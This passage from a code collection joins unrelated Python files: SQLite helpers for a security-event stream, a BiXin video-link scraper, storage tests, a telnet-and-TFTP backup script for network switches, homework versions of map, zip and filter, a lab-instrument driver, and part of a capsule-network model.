AND email=?", (client_id, email) ).fetchone() if row: return Status(row["status"]) else: raise SubjectNotInStream(email) def remove_subject(client_id: str, email: str) -> None: """Remove a subject from a stream""" with connection() as conn: with conn: conn.execute( "DELETE FROM subjects WHERE client_id=? AND email=?", (client_id, email) ) def delete_subjects(client_id: str) -> None: """Delete all subjects for a stream""" with connection() as conn: with conn: conn.execute( "DELETE FROM subjects WHERE client_id=?", (client_id,) ) def add_set(client_id: str, SET: SecurityEvent) -> None: """Add a SET to the stream""" with connection() as conn: with conn: conn.execute( "INSERT INTO SETs VALUES (?, ?, ?, ?)", (client_id, SET.jti, SET.iat, JSONEncoder().encode(SET)) ) def delete_SETs(client_id: str, jtis: Optional[List[str]] = None) -> None: """Delete SETs from the stream, based on their jtis""" sql = "DELETE FROM SETs WHERE client_id=?" if jtis: qmarks = ",".join(["?"] * len(jtis)) sql += f" AND jti IN ({qmarks})" with connection() as conn: with conn: conn.execute(sql, (client_id, *jtis) if jtis else (client_id, )) def count_SETs(client_id: str) -> int: """How many SETs are in the stream?""" with connection() as conn: return conn.execute( "SELECT COUNT(*) FROM SETs WHERE client_id = ?", (client_id,) ).fetchone()[0] def get_SETs(client_id: str, max_events: Optional[int] = None) -> List[SecurityEvent]: """Get up to max_events SETs from the stream""" if max_events is not None and max_events <= 0: return [] sql = "SELECT * FROM SETs WHERE client_id=? ORDER BY timestamp" if max_events is not None: sql += f" LIMIT {max_events}" with connection() as conn: results = conn.execute(sql, (client_id, )).fetchall() return [ SecurityEvent.parse_obj(json.loads(r["event"])) for r in results ]
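# --- Hypothetical usage sketch (not part of the original file) ---
# Rough outline of how the helpers above fit together; the DB path, client id
# and stream payload are invented for illustration only.
#
# import os, json
# os.environ["DB_PATH"] = "/tmp/transmitter.sqlite3"     # assumed location
# create(drop=True)                                      # build the three tables
# save_stream("client-123", json.dumps({"format": "email"}))
# add_subject("client-123", "user@example.com")
# print(get_subject_status("client-123", "user@example.com"))
# print(count_SETs("client-123"))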
1.59375
2
app/src/main/python/bixin.py
One-PZ/lmgp
0
12749099
# -*- coding:utf-8 -*-
import re
import json
import requests

"""
Target app: BiXin Peilian (比心陪练)
Target URL: a short-video share link from the app
Scraping approach:
1. Get the video URL from the in-app share dialog and extract its timelineId
2. Send a POST request to https://h5.hibixin.com/capi/bixin/timeline/shareTimeline and parse the JSON response
"""


class BiXin(object):
    def __init__(self, url):
        self.url = url
        self.session = requests.Session()

    def get_video(self):
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36",
            "Host": "h5.hibixin.com",
            "Origin": "https://h5.hibixin.com",
            "Content-Type": "application/json"
        }
        pattern = re.compile(r"dynamic_id=(\w+)", re.S)
        dynamic_id = re.findall(pattern, str(self.url).strip())[0]
        try:
            # A single video of the user
            base_url = "https://h5.hibixin.com/capi/bixin/timeline/shareTimeline"
            data = {
                "timelineId": dynamic_id
            }
            response = self.session.post(url=base_url, headers=headers, data=json.dumps(data), timeout=10)
            if response.status_code == 200:
                doc = response.json()
                title = doc["result"]["timelineInfo"]["content"]
                cover = doc["result"]["timelineInfo"]["videoInfoDTO"]["videoFirstImg"]
                video = doc["result"]["timelineInfo"]["videoInfoDTO"]["videoUrl"]
                info = {
                    "title": title,
                    "cover": cover,
                    "video": video
                }
                return json.dumps(info, ensure_ascii=False)
            else:
                return json.dumps({"info": "No data available; please check the request:"}, ensure_ascii=False)
        except Exception as e:
            return json.dumps({"info": "No data available; please check the request: " + str(e)}, ensure_ascii=False)


if __name__ == '__main__':
    bi_xin = BiXin("https://h5.hibixin.com/bixin/web-share/index?refer_page=ExploreDynamicDetailPage"
                   "&refer_share_channel=qqFriends#/?dynamic_id=1011146143398583404")
    print(bi_xin.get_video())
1.59375
2
tests/test_system_storable_list.py
fatz/dcos_migrate
0
12749227
from dcos_migrate.system import StorableList, Backup


def create_example_list(dir: str) -> StorableList:
    list = StorableList(str(dir))
    p = "testPlugin"
    b = "foobar"
    d = {"foo": "bar"}

    list.append(Backup(pluginName=p, backupName=b, data=d))
    list.store()

    return list, p, b, d


def test_store(tmpdir):
    dir = tmpdir.mkdir("test")
    list, p, b, d = create_example_list(str(dir))

    assert len(dir.listdir()) == 1
    assert dir.dirpath("test/{}/{}.Backup.json".format(p, b)).check()


def test_load(tmpdir):
    dir = tmpdir.mkdir("test")
    list, p, b, d = create_example_list(str(dir))

    list2 = StorableList(str(dir)).load()

    # we expect different objects
    assert list != list2
    # but the same amount
    assert len(list) == len(list2)
    # and data
    assert list[0].data == list2[0].data
1.796875
2
src/backupSwitchDatacom.py
ronikleyton/script-backup-switch-datacom
0
12749355
<filename>src/backupSwitchDatacom.py
from telnetlib import Telnet
from exception.exceptions import *
from datetime import date
import time
import os
from dotenv import load_dotenv
import json

load_dotenv()
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))

f = open(f'{ROOT_DIR}/equipamentos.json')
equipamentos = json.load(f)['equipamentos']


def backupSwitchDatacom(equipamento):
    IP_SERVER_TFTP = os.environ.get('IP_SERVER_TFTP')
    data_atual = date.today()
    data_em_texto = "{}-{}-{}".format(data_atual.day, data_atual.month, data_atual.year)
    r = '\r'
    r = r.encode('ascii')
    try:
        equipamento.connection = Telnet(equipamento.ip, equipamento.port)

        # Perform login
        index, match_obj, text = equipamento.connection.expect(["login: ".encode('latin-1')], timeout=2)
        if not match_obj:
            raise CommandError(f"Connection failed, OLT RESPONSE: {text}")
        equipamento.connection.write(f"{equipamento.user}\r".encode('latin-1'))

        index, match_obj, text = equipamento.connection.expect(["Password:".encode('latin-1')], timeout=2)
        if not match_obj:
            raise CommandError(f"Username step failed, OLT RESPONSE: {text}")
        equipamento.connection.write(f"{equipamento.password}\r".encode('latin-1'))

        index, match_obj, text = equipamento.connection.expect(["#".encode('latin-1')], timeout=2)
        if not match_obj:
            raise CommandError("Failed to send the password")

        nomeDoArquivo = f"{equipamento.hostname}-{data_em_texto}-config.txt"
        tftp = f"show running-config | save overwrite {nomeDoArquivo}"
        tftp = tftp.encode('ascii')
        equipamento.connection.write(tftp + r)
        time.sleep(50)

        index, match_obj, text = equipamento.connection.expect(["#".encode('latin-1')], timeout=2)
        if not match_obj:
            raise CommandError("Failed to execute the command that saves the running config")

        comando = f"copy file {nomeDoArquivo} tftp://{IP_SERVER_TFTP}/{equipamento.hostname}"
        comando = comando.encode('ascii')
        equipamento.connection.write(comando + r)
        time.sleep(5)

        index, match_obj, text = equipamento.connection.expect(["#".encode('latin-1')], timeout=2)
        if not match_obj:
            raise CommandError("Failed to send the file to the TFTP server")

        comando = f"file delete {nomeDoArquivo}"
        comando = comando.encode('ascii')
        equipamento.connection.write(comando + r)
        index, match_obj, text = equipamento.connection.expect(["#".encode('latin-1')], timeout=2)

        print('Backup finished')
        equipamento.connection.close()
    except:
        equipamento.connection.close()
        raise ConnectionError()


class Equipamento:
    def __init__(self, hostname, ip, port, user, password):
        self.connection = None
        self.hostname = hostname
        self.ip = ip
        self.port = port
        self.user = user
        self.password = password


for switch in equipamentos:
    try:
        PORT_TELNET = os.environ.get('PORT_TELNET')
        USER = os.environ.get('USER')
        PASS = os.environ.get('PASS')
        print(f"Starting backup on switch {switch['hostname']}")
        equipamento = Equipamento(switch['hostname'], switch['ip'], PORT_TELNET, USER, PASS)
        backupSwitchDatacom(equipamento)
    except Exception as error:
        print(error)
        pass
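# --- Hypothetical configuration sketch (not part of the original file) ---
# The script expects an equipamentos.json next to it plus a .env file; the
# values below are invented placeholders that match the keys read above.
#
# equipamentos.json:
# {
#     "equipamentos": [
#         {"hostname": "SW-CORE-01", "ip": "192.0.2.10"},
#         {"hostname": "SW-EDGE-02", "ip": "192.0.2.11"}
#     ]
# }
#
# .env:
# PORT_TELNET=23
# USER=backup
# PASS=changeme
# IP_SERVER_TFTP=192.0.2.50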
1.4375
1
P25034-zhaojie/week-11/homework.py
xiaohh2016/python-25
0
12749483
<reponame>xiaohh2016/python-25
#!/usr/bin/env python
# encoding:utf-8
# file: homework.py
# Implement Python's built-in map, zip and filter functions by hand
# yield syntax is still unfamiliar, so keep the implementation simple for now


# Implement the map function
def my_map(*args):
    """Docstring placeholder
    """
    if len(args) < 2:
        # For now just print instead of raising an exception
        print('map() requires at least two arguments')
    else:
        # Checking whether the arguments are iterable is not handled yet
        fnc_nme = args[0]
        new_tpl = args[1:]
        min_len = len(min(new_tpl, key=len))
        for idx in range(min_len):
            # Code after yield keeps running; any function containing yield becomes a generator
            yield fnc_nme(*[itr[idx] for itr in new_tpl])


# Implement the zip function
def my_zip(*args):
    if not len(args):
        return tuple()
    min_len = len(min(args, key=len))
    for idx in range(min_len):
        yield tuple(itr[idx] for itr in args)


# Implement the filter function
def my_filter(func, itr):
    if func is not None:
        for it in itr:
            if func(it):
                yield it
    else:
        for it in itr:
            if it:
                yield it


# Test function: addition
def func1(x, y):
    return x + y


# Test function: square
def func2(x):
    return x ** 2


# Test function: keep numbers greater than 100
def func3(x):
    return True if x > 100 else False


if __name__ == '__main__':
    l1 = [3, 2, 3]
    l2 = [6, 5]
    print(list(my_map(func1, l1, l2)))
    print(list(my_zip([1, 2, 3], [4, 5], 'abcdefg')))
    print(list(my_filter(func3, [0, 201, 1, 2, 3, 100, 101])))
    print(list(my_zip()))
    print(list(my_filter(None, [0, 201, 1, 2, 3, 100, 101])))
    print('-------- Built-ins for comparison --------')
    print(list(map(func1, l1, l2)))
    print(list(zip([1, 2, 3], [4, 5], 'abcdefg')))
    print(list(filter(func3, [0, 201, 1, 2, 3, 100, 101])))
    print(list(zip()))
    print(list(filter(None, [0, 201, 1, 2, 3, 100, 101])))
2.6875
3
pymeasure/instruments/razorbill/razorbillRP100.py
KOLANICH-physics/pymeasure
2
12749611
<reponame>KOLANICH-physics/pymeasure<filename>pymeasure/instruments/razorbill/razorbillRP100.py
#
# This file is part of the PyMeasure package.
#
# Copyright (c) 2013-2019 PyMeasure Developers
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#

from pymeasure.instruments import Instrument
from pymeasure.instruments.validators import (strict_discrete_set,
                                              strict_range)


class razorbillRP100(Instrument):
    """Represents Razorbill RP100 strain cell controller

    .. code-block:: python

        scontrol = razorbillRP100("ASRL/dev/ttyACM0::INSTR")

        scontrol.output_1 = True      # turns output on
        scontrol.slew_rate_1 = 1      # sets slew rate to 1V/s
        scontrol.voltage_1 = 10       # sets voltage on output 1 to 10V
    """

    output_1 = Instrument.control("OUTP1?", "OUTP1 %d",
                                  """Turns output of channel 1 on or off""",
                                  validator=strict_discrete_set,
                                  values={True: 1, False: 0},
                                  map_values=True)
    output_2 = Instrument.control("OUTP2?", "OUTP2 %d",
                                  """Turns output of channel 2 on or off""",
                                  validator=strict_discrete_set,
                                  values={True: 1, False: 0},
                                  map_values=True)
    voltage_1 = Instrument.control("SOUR1:VOLT?", "SOUR1:VOLT %g",
                                   """Sets or queries the output voltage of channel 1""",
                                   validator=strict_range,
                                   values=[-230, 230])
    voltage_2 = Instrument.control("SOUR2:VOLT?", "SOUR2:VOLT %g",
                                   """Sets or queries the output voltage of channel 2""",
                                   validator=strict_range,
                                   values=[-230, 230])
    slew_rate_1 = Instrument.control("SOUR1:VOLT:SLEW?", "SOUR1:VOLT:SLEW %g",
                                     """Sets or queries the source slew rate in volts/sec of channel 1""",
                                     validator=strict_range,
                                     values=[0.1*10e-3, 100*10e3])
    slew_rate_2 = Instrument.control("SOUR2:VOLT:SLEW?", "SOUR2:VOLT:SLEW %g",
                                     """Sets or queries the source slew rate in volts/sec of channel 2""",
                                     validator=strict_range,
                                     values=[0.1*10e-3, 100*10e3])
    instant_voltage_1 = Instrument.measurement("SOUR1:VOLT:NOW?",
                                               """Returns the instantaneous output of source one in volts""")
    instant_voltage_2 = Instrument.measurement("SOUR2:VOLT:NOW?",
                                               """Returns the instantaneous output of source two in volts""")
    contact_voltage_1 = Instrument.measurement("MEAS1:VOLT?",
                                               """Returns the voltage in volts present at the front panel output of channel 1""")
    contact_voltage_2 = Instrument.measurement("MEAS2:VOLT?",
                                               """Returns the voltage in volts present at the front panel output of channel 2""")
    contact_current_1 = Instrument.measurement("MEAS1:CURR?",
                                               """Returns the current in amps present at the front panel output of channel 1""")
    contact_current_2 = Instrument.measurement("MEAS2:CURR?",
                                               """Returns the current in amps present at the front panel output of channel 2""")

    def __init__(self, adapter, **kwargs):
        super(razorbillRP100, self).__init__(
            adapter,
            "Razorbill RP100 Piezo Stack Powersupply",
            **kwargs
        )
        self.timeout = 20
1.429688
1
src/capsule_model.py
Sharut/Bilinear-Linformer
0
12749739
<reponame>Sharut/Bilinear-Linformer<filename>src/capsule_model.py<gh_stars>0 # # For licensing see accompanying LICENSE file. # Copyright (C) 2019 Apple Inc. All Rights Reserved. # from src import layers import torch.nn as nn import torch.nn.functional as F import torch ''' {'backbone': {'kernel_size': 3, 'output_dim': 128, 'input_dim': 3, 'stride': 2, 'padding': 1, 'out_img_size': 16}, 'primary_capsules': {'kernel_size': 1, 'stride': 1, 'input_dim': 128, 'caps_dim': 16, 'nu m_caps': 32, 'padding': 0, 'out_img_size': 16}, 'capsules': [{'type': 'CONV', 'num_caps': 32, 'caps_dim': 16, 'kernel_size': 3, 'stride': 2, 'matrix_pose': True, 'out_img_size': 7}, {'type': 'CONV', 'num_ caps': 32, 'caps_dim': 16, 'kernel_size': 3, 'stride': 1, 'matrix_pose': True, 'out_img_size': 5}], 'class_capsules': {'num_caps': 10, 'caps_dim': 16, 'matrix_pose': True}} {'kernel_size': 1, 'stride': 1, 'input_dim': 128, 'caps_dim': 16, 'num_caps': 32, 'padding': 0, 'out_img_size': 16} ''' # Capsule model with bilinear routing and random projections class CapsBilinearLinformerUnfoldModel(nn.Module): def __init__(self, image_dim_size, params, dataset, backbone, dp, num_routing, sequential_routing=True): super(CapsBilinearLinformerUnfoldModel, self).__init__() #### Parameters self.sequential_routing = sequential_routing ## Primary Capsule Layer self.pc_num_caps = params['primary_capsules']['num_caps'] self.pc_caps_dim = params['primary_capsules']['caps_dim'] self.pc_output_dim = params['primary_capsules']['out_img_size'] ## General self.num_routing = num_routing # >3 may cause slow converging #### Building Networks ## Backbone (before capsule) if backbone == 'simple': self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['kernel_size'], params['backbone']['stride'], params['backbone']['padding']) elif backbone == 'resnet': # Ouputs 16 X 16 X 128 dim if dataset == 'CIFAR10' or dataset == 'CIFAR100': print("Using CIFAR backbone") self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) else: print("Using New ResNet Backbone") self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) ## Primary Capsule Layer (a single CNN) self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'], out_channels=params['primary_capsules']['num_caps'] *\ params['primary_capsules']['caps_dim'], kernel_size=params['primary_capsules']['kernel_size'], stride=params['primary_capsules']['stride'], padding=params['primary_capsules']['padding'], bias=False) #self.pc_layer = nn.Sequential() self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim']) ## Main Capsule Layers self.capsule_layers = nn.ModuleList([]) for i in range(len(params['capsules'])): if params['capsules'][i]['type'] == 'CONV': in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \ params['capsules'][i-1]['num_caps'] in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \ params['capsules'][i-1]['caps_dim'] output_img_size = params['capsules'][i]['out_img_size'] input_img_size = params['primary_capsules']['out_img_size'] if i==0 else \ params['capsules'][i-1]['out_img_size'] self.capsule_layers.append( layers.LACapsuleCONV(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], 
kernel_size=params['capsules'][i]['kernel_size'], stride=params['capsules'][i]['stride'], input_img_size = input_img_size, output_img_size = output_img_size, hidden_dim= params['capsules'][i]['hidden_dim'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp, coordinate_add=False, padding=params['capsules'][i].get('padding', None) ) ) elif params['capsules'][i]['type'] == 'FC': output_img_size = 1 if i == 0: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] input_img_size = params['primary_capsules']['out_img_size'] elif params['capsules'][i-1]['type'] == 'FC': in_n_caps = params['capsules'][i-1]['num_caps'] in_d_caps = params['capsules'][i-1]['caps_dim'] input_img_size = 1 elif params['capsules'][i-1]['type'] == 'CONV': in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\ params['capsules'][i-1]['out_img_size'] in_d_caps = params['capsules'][i-1]['caps_dim'] input_img_size = params['capsules'][i-1]['out_img_size'] self.capsule_layers.append( layers.LACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], input_img_size = input_img_size, output_img_size = output_img_size, hidden_dim= params['capsules'][i]['hidden_dim'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp ) ) ## Class Capsule Layer if not len(params['capsules'])==0: output_img_size = 1 if params['capsules'][-1]['type'] == 'FC': in_n_caps = params['capsules'][-1]['num_caps'] in_d_caps = params['capsules'][-1]['caps_dim'] input_img_size = 1 elif params['capsules'][-1]['type'] == 'CONV': in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\ params['capsules'][-1]['out_img_size'] in_d_caps = params['capsules'][-1]['caps_dim'] input_img_size = params['capsules'][-1]['out_img_size'] else: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] input_img_size = params['primary_capsules']['out_img_size'] self.capsule_layers.append( layers.LACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['class_capsules']['num_caps'], out_d_capsules=params['class_capsules']['caps_dim'], input_img_size = input_img_size, output_img_size = output_img_size, hidden_dim= params['capsules'][i]['hidden_dim'], matrix_pose=params['class_capsules']['matrix_pose'], dp=dp ) ) ## After Capsule # fixed classifier for all class capsules self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1) # different classifier for different capsules #self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim'])) def forward(self, x, lbl_1=None, lbl_2=None): #### Forward Pass ## Backbone (before capsule) c = self.pre_caps(x) # print(c.shape) # print("Backbone: ", c.shape) ## Primary Capsule Layer (a single CNN) u = self.pc_layer(c) # torch.Size([100, 512, 14, 14]) u = u.permute(0, 2, 3, 1) # 100, 14, 14, 512 # print("Shape:", u.shape) u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # 100, 14, 14, 32, 16 u = u.permute(0, 3, 1, 2, 4) # 100, 32, 14, 14, 16 init_capsule_value = self.nonlinear_act(u)#capsule_utils.squash(u) ## Main Capsule Layers # concurrent routing if not 
self.sequential_routing: # first iteration # perform initilialization for the capsule values as single forward passing capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(_val, 0) capsule_values.append(_val) # get the capsule value for next layer # second to t iterations # perform the routing between capsule layers for n in range(self.num_routing-1): _capsule_values = [init_capsule_value] for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(capsule_values[i], n, capsule_values[i+1]) _capsule_values.append(_val) capsule_values = _capsule_values # sequential routing else: capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): # first iteration __val = self.capsule_layers[i].forward(_val, 0) # second to t iterations # perform the routing between capsule layers for n in range(self.num_routing-1): __val = self.capsule_layers[i].forward(_val, n, __val) _val = __val capsule_values.append(_val) ## After Capsule out = capsule_values[-1] # print("out shape, ", out.shape) out = self.final_fc(out) # fixed classifier for all capsules # print("classifier shape, ", out.shape) out = out.squeeze(1) # fixed classifier for all capsules out = out.squeeze(2) out = out.squeeze(1) #out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules # print("Final shape, ", out.shape) return out # Capsule model class CapsModel(nn.Module): def __init__(self, image_dim_size, params, dataset, backbone, dp, num_routing, sequential_routing=True): super(CapsModel, self).__init__() #### Parameters self.sequential_routing = sequential_routing ## Primary Capsule Layer self.pc_num_caps = params['primary_capsules']['num_caps'] self.pc_caps_dim = params['primary_capsules']['caps_dim'] self.pc_output_dim = params['primary_capsules']['out_img_size'] ## General self.num_routing = num_routing # >3 may cause slow converging #### Building Networks ## Backbone (before capsule) if backbone == 'simple': self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['kernel_size'], params['backbone']['stride'], params['backbone']['padding']) elif backbone == 'resnet': # Ouputs 16 X 16 X 128 dim if dataset == 'CIFAR10' or dataset == 'CIFAR100' or "NIST" in dataset: print("Using standard ResNet Backbone") self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) else: print("Using New ResNet Backbone") self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) ## Primary Capsule Layer (a single CNN) # {'kernel_size': 1, 'stride': 1, 'input_dim': 128, 'caps_dim': 16, 'num_caps': 32, 'padding': 0, 'out_img_size': 16} print(params['primary_capsules']) self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'], out_channels=params['primary_capsules']['num_caps'] *\ params['primary_capsules']['caps_dim'], kernel_size=params['primary_capsules']['kernel_size'], stride=params['primary_capsules']['stride'], padding=params['primary_capsules']['padding'], bias=False) #self.pc_layer = nn.Sequential() self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim']) ## Main Capsule Layers self.capsule_layers = nn.ModuleList([]) for i in range(len(params['capsules'])): if 
params['capsules'][i]['type'] == 'CONV': in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \ params['capsules'][i-1]['num_caps'] in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \ params['capsules'][i-1]['caps_dim'] # num_in_capsules=32, in_cap_d=16, out_Cap=32, out_dim_cap=16 # 3x3 kernel, stride 2 and output shape: 7x7 self.capsule_layers.append( layers.CapsuleCONV(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], kernel_size=params['capsules'][i]['kernel_size'], stride=params['capsules'][i]['stride'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp, coordinate_add=False ) ) elif params['capsules'][i]['type'] == 'FC': if i == 0: # When there is no Conv layer after primary capsules in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] elif params['capsules'][i-1]['type'] == 'FC': in_n_caps = params['capsules'][i-1]['num_caps'] in_d_caps = params['capsules'][i-1]['caps_dim'] elif params['capsules'][i-1]['type'] == 'CONV': # There are a total of 14X14X32 capsule outputs, each being 16 dimensional in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\ params['capsules'][i-1]['out_img_size'] in_d_caps = params['capsules'][i-1]['caps_dim'] self.capsule_layers.append( layers.CapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp ) ) ## Class Capsule Layer if not len(params['capsules'])==0: if params['capsules'][-1]['type'] == 'FC': in_n_caps = params['capsules'][-1]['num_caps'] in_d_caps = params['capsules'][-1]['caps_dim'] elif params['capsules'][-1]['type'] == 'CONV': in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\ params['capsules'][-1]['out_img_size'] in_d_caps = params['capsules'][-1]['caps_dim'] else: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] self.capsule_layers.append( layers.CapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['class_capsules']['num_caps'], out_d_capsules=params['class_capsules']['caps_dim'], matrix_pose=params['class_capsules']['matrix_pose'], dp=dp ) ) ## After Capsule # fixed classifier for all class capsules self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1) # different classifier for different capsules #self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim'])) def forward(self, x, lbl_1=None, lbl_2=None): #### Forward Pass ## Backbone (before capsule) # Converts Input (b, 3, 14, 14)--> (b, 128, 14, 14) c = self.pre_caps(x) ## Primary Capsule Layer (a single CNN) (Ouput size: b, 512, 14, 14) (32 caps, 16 dim each) u = self.pc_layer(c) u = u.permute(0, 2, 3, 1) # b, 14, 14, 512 u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # b, 14, 14, 32, 16 u = u.permute(0, 3, 1, 2, 4) # b, 32, 14, 14, 16 # Layer norm init_capsule_value = self.nonlinear_act(u) #capsule_utils.squash(u) ## Main Capsule Layers # concurrent routing if not self.sequential_routing: # first 
iteration # perform initilialization for the capsule values as single forward passing capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(_val, 0) capsule_values.append(_val) # get the capsule value for next layer # second to t iterations # perform the routing between capsule layers for n in range(self.num_routing-1): _capsule_values = [init_capsule_value] for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(capsule_values[i], n, capsule_values[i+1]) _capsule_values.append(_val) capsule_values = _capsule_values # sequential routing else: capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): # first iteration __val = self.capsule_layers[i].forward(_val, 0) # second to t iterations # perform the routing between the 2 capsule layers for some iterations # till you move to next pair of layers for n in range(self.num_routing-1): __val = self.capsule_layers[i].forward(_val, n, __val) _val = __val capsule_values.append(_val) ## After Capsule # Output capsule (last layer) out = capsule_values[-1] out = self.final_fc(out) # fixed classifier for all capsules out = out.squeeze() # fixed classifier for all capsules #out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules return out # Capsule model with bilinear sparse routing class CapsSAModel(nn.Module): def __init__(self, image_dim_size, params, dataset, backbone, dp, num_routing, sequential_routing=True): super(CapsSAModel, self).__init__() #### Parameters self.sequential_routing = sequential_routing ## Primary Capsule Layer self.pc_num_caps = params['primary_capsules']['num_caps'] self.pc_caps_dim = params['primary_capsules']['caps_dim'] self.pc_output_dim = params['primary_capsules']['out_img_size'] ## General self.num_routing = num_routing # >3 may cause slow converging #### Building Networks ## Backbone (before capsule) if backbone == 'simple': self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['kernel_size'], params['backbone']['stride'], params['backbone']['padding']) elif backbone == 'resnet': # Ouputs 16 X 16 X 128 dim if dataset == 'CIFAR10' or dataset == 'CIFAR100'or "NIST" in dataset: print("Using CIFAR backbone") self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) else: print("Using New ResNet Backbone") self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) ## Primary Capsule Layer (a single CNN) self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'], out_channels=params['primary_capsules']['num_caps'] *\ params['primary_capsules']['caps_dim'], kernel_size=params['primary_capsules']['kernel_size'], stride=params['primary_capsules']['stride'], padding=params['primary_capsules']['padding'], bias=False) #self.pc_layer = nn.Sequential() self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim']) ## Main Capsule Layers self.capsule_layers = nn.ModuleList([]) for i in range(len(params['capsules'])): if params['capsules'][i]['type'] == 'CONV': in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \ params['capsules'][i-1]['num_caps'] in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \ params['capsules'][i-1]['caps_dim'] 
